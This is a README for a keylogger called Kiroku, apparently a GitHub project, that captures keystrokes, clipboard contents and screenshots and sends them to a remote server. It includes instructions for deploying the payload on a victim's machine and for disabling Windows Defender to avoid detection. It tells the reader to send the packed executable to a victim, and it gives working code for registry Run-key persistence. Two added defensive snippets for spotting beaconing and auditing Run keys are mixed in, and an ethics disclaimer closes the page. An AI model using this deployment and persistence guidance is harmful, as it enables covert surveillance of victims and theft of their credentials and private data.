
Kiroku Keylogger


Kiroku Keylogger is a sophisticated tool designed to capture and monitor a wide range of user activities on a target system. It is equipped to log keystrokes, monitor clipboard contents, and take periodic screenshots and webcam images, which are then transmitted to a remote server at regular intervals.

Payload Features

  • Keystroke Logging: Captures all keystrokes, including special keys like Enter, Tab, and Backspace, and sends them to a specified server.
  • Clipboard Monitoring: Continuously monitors clipboard content, detecting changes and sending the updated data to the server.
  • Screenshot Capture: Takes screenshots at regular intervals and sends them to the server in a base64-encoded format.
  • Webcam Image Capture: Takes webcam images at regular intervals and also sends them to the server in base64-encoded format. (Not compatible with Linux, so we removed it.)
  • Modifier Key Tracking: Tracks the state of Ctrl, Alt, and Shift keys to accurately capture key combinations.
  • Configurable Intervals: Allows customization of the intervals for sending keystrokes, clipboard data, and screenshots.
  • JSON Payloads: Packages keystrokes, clipboard data, and screenshots into JSON format for server transmission.
  • Threaded Execution: Runs keystroke logging, clipboard monitoring, and screenshot capture in separate threads for efficient performance.
  • Automatic Transmission: Periodically sends captured data to the server without user intervention.
  • Base64 Encoding: Encodes screenshots in base64 format before transmission to reduce the payload size.
  • Platform Compatibility: Designed to work seamlessly on multiple platforms with minimal configuration changes.

Server Features

  • Keystroke Logging: Receives and logs keystrokes from the payload, saving them to a specified file.
  • Clipboard Data Capture: Captures clipboard content from the payload and saves it to a specified file. Optionally logs clipboard data based on user preference.
  • Screenshot Handling: Receives base64-encoded screenshots from the payload, decodes them, and saves them as PNG files in a specified directory.
  • Webcam Handling: Receives base64-encoded webcam images from the payload, decodes them, and saves them as PNG files in a specified directory.
  • Victim IP Logging: Logs the IP address of the victim alongside captured data to identify the source.
  • JSON Parsing and Error Handling: Parses incoming data in JSON format and handles errors like invalid JSON or server issues with detailed logging.
  • Customizable Configuration: Allows customization of the server port, file paths for saved keystrokes, clipboard data, and screenshot storage directory.
  • Threaded Execution: Handles incoming POST requests concurrently, ensuring smooth and efficient server performance.
  • Logging: Provides detailed logging of all activities, including received data, errors, and server operations.
  • Session Persistence: Automatically reconnects and continues sessions if the server is restarted while the payload is still running, ensuring uninterrupted data capture.
  • Interactive Use: The server offers a GUI for more interactive and customizable listening.
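
For defenders, the behaviour listed above (JSON POSTs sent on a fixed timer to a single server) shows up in proxy or flow logs as near-constant gaps between requests. The following is an added example, not part of the Kiroku code: it flags source/destination pairs whose POST intervals vary very little; the log layout, thresholds and sample lines are constructed assumptions.

```python
import statistics
from collections import defaultdict

# Constructed proxy-log lines (assumed layout): epoch_s src dst method bytes
SAMPLE_LOG = """\
1000.0 10.0.0.5 203.0.113.10:8080 POST 412
1003.0 10.0.0.7 198.51.100.20:443 POST 2210
1004.0 10.0.0.7 198.51.100.20:443 POST 95
1010.2 10.0.0.5 203.0.113.10:8080 POST 398
1015.0 10.0.0.7 198.51.100.20:443 GET 0
1019.9 10.0.0.5 203.0.113.10:8080 POST 405
1030.1 10.0.0.5 203.0.113.10:8080 POST 420
1040.0 10.0.0.5 203.0.113.10:8080 POST 401
1047.0 10.0.0.7 198.51.100.20:443 POST 130
1050.1 10.0.0.5 203.0.113.10:8080 POST 415
1190.0 10.0.0.7 198.51.100.20:443 POST 640
1420.0 10.0.0.7 198.51.100.20:443 POST 88
"""


def find_beacons(log_text, min_events=5, max_cv=0.1):
    """Return (src, dst) pairs whose POSTs arrive at near-constant intervals."""
    times = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[3] != "POST":
            continue  # skip malformed lines and non-POST traffic
        try:
            times[(parts[1], parts[2])].append(float(parts[0]))
        except ValueError:
            continue  # timestamp was not numeric
    hits = []
    for (src, dst), stamps in sorted(times.items()):
        if len(stamps) < min_events:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        # Coefficient of variation: near zero means timer-driven traffic.
        cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
        if cv <= max_cv:
            hits.append({"src": src, "dst": dst, "posts": len(stamps),
                         "interval_s": round(mean, 1), "cv": round(cv, 3)})
    return hits


if __name__ == "__main__":
    print(find_beacons(SAMPLE_LOG))
```

Several timers posting to the same server interleave and raise the variation, so splitting each pair by request size before scoring helps separate the streams.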

Installation && Usage

  • Clone the repository:

    git clone https://github.com/Kuraiyume/Kiroku

  • Install the necessary libraries:

    pip3 install -r requirements.txt

    You will need to install this on the victim's machine

  • On the attacker machine, run the server:

    python3 server.py

    If Tkinter is not installed, install it using 'sudo apt install python3-tk'

  • On the victim device, configure the payload and run the script:

    python3 payload_windows.py

    If your target is a Linux machine:

    python3 payload_linux.py

How to make the payload run without needing a Python interpreter?

  • You will need to install the required modules for the payload:

    pip3 install -r requirements.txt

    Ensure that all of the modules are installed!

  • Configure the payload before turning it into an executable: change the server IP, port, and the time intervals (if needed).

  • We will use PyInstaller to convert our payload to a standalone executable (PyInstaller is included in the requirements.txt).

  • We will use the 'payload.spec' file to convert our payload to an executable, but first, configure how your executable should be packed based on your requirements.

  • After configuration, we will use PyInstaller along with the payload.spec to generate an executable version of the payload:

    pyinstaller payload_windows.spec

    If your target is a Linux machine:

    pyinstaller payload_linux.spec

    Make sure to build the executable on the same OS as the target system to avoid compatibility issues due to architecture differences. If you're building the executable on Windows, you should turn off the Real-Time Protection in Windows Defender to avoid detection while building.

  • Once the conversion is done, you will see a dist folder; that's where your executable lives. Now all you need to do is run the server on the attacker's machine, send the executable to the victim, and wait for the victim to click it. Once clicked, the payload will do its work.

    Ensure all configurations made before the conversion are correct and match the attacker's machine setup.

  • (Windows only) If you want to make it persistent when you convert it to an executable, you'll need to add logic to the payload that can add itself to the Windows registry when it runs as an executable. Here's how you can do that:

    1. Import the winreg and sys modules to allow your payload to integrate with the registry and file system (sys):
      import winreg
      import sys
    2. Add this function:
      def add_to_registry():
          exe_path = sys.executable
          try:
              registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_SET_VALUE)
              key_name = 'Kiroku'
              winreg.SetValueEx(registry_key, key_name, 0, winreg.REG_SZ, exe_path)
              winreg.CloseKey(registry_key)
          except Exception as e:
              print(f"Failed to add executable to registry: {e}")
    3. Call the function in the main guard (at the beginning):
      if __name__ == "__main__":
          add_to_registry()
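
The function above leaves a value named 'Kiroku' under the current user's Run key, pointing at wherever the executable was launched from, which is what an autostart audit should look for. The following is an added example, not part of the Kiroku code: it reviews HKCU Run values for that name and for binaries in user-writable folders; the folder list and the sample entries are constructed assumptions.

```python
import ntpath
import re
import sys

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
KNOWN_NAMES = {"kiroku"}  # value name hard-coded in the page's add_to_registry()
# User-writable folders where autostart binaries are unusual (assumed policy).
RISKY_DIRS = ("\\appdata\\local\\temp\\", "\\downloads\\", "\\desktop\\", "\\users\\public\\")
# Constructed sample values, used when not running on Windows.
SAMPLE = [
    ("OneDrive", r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'),
    ("Kiroku", r"C:\Users\bob\Downloads\invoice.exe"),
    ("Updater", r"C:\Users\bob\AppData\Local\Temp\upd.exe -silent"),
]


def exe_path(command):
    """Extract the executable path from a Run value, quoted or not."""
    m = re.match(r'\s*"([^"]+)"', command)
    m = m or re.match(r"\s*(.+?\.exe)\b", command, re.I)
    return m.group(1) if m else command.strip()


def audit_run_entries(entries):
    """Return (name, path, reasons) for Run values that deserve review."""
    findings = []
    for name, command in entries:
        path = ntpath.normpath(exe_path(str(command))).lower()
        reasons = []
        if str(name).lower() in KNOWN_NAMES:
            reasons.append("known value name")
        if any(d in path for d in RISKY_DIRS):
            reasons.append("user-writable directory")
        if reasons:
            findings.append((name, path, reasons))
    return findings


def read_hkcu_run():
    """Enumerate the current user's Run values (Windows only)."""
    import winreg
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        count = winreg.QueryInfoKey(key)[1]  # number of values under the key
        return [winreg.EnumValue(key, i)[:2] for i in range(count)]


if __name__ == "__main__":
    entries = read_hkcu_run() if sys.platform == "win32" else SAMPLE
    print(*audit_run_entries(entries), sep="\n")
```

The value name is trivial to change, so the path-based reason is the more durable signal; the name match only catches unmodified builds.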

Warning

This tool is intended strictly for educational purposes and ethical hacking only. Unauthorized use of this tool for malicious activities or without explicit consent is illegal and strictly prohibited.

  • Ethical Use Only: Ensure that you have proper authorization before deploying or using this tool. It is meant to help understand security vulnerabilities and improve defenses, not to invade privacy or engage in unlawful activities.
  • Legal Compliance: Be fully aware of and comply with all applicable laws and regulations in your jurisdiction. Misuse of this tool can result in severe legal consequences.
  • Responsibility: The creator of this tool does not condone or support illegal activities. Use this tool responsibly and ethically to advance your knowledge and skills in cybersecurity.

Proceed with caution and integrity. Your actions reflect your respect for privacy and the law.

License

  • Kiroku is licensed under the GNU General Public License.

Author

  • A1SBERG
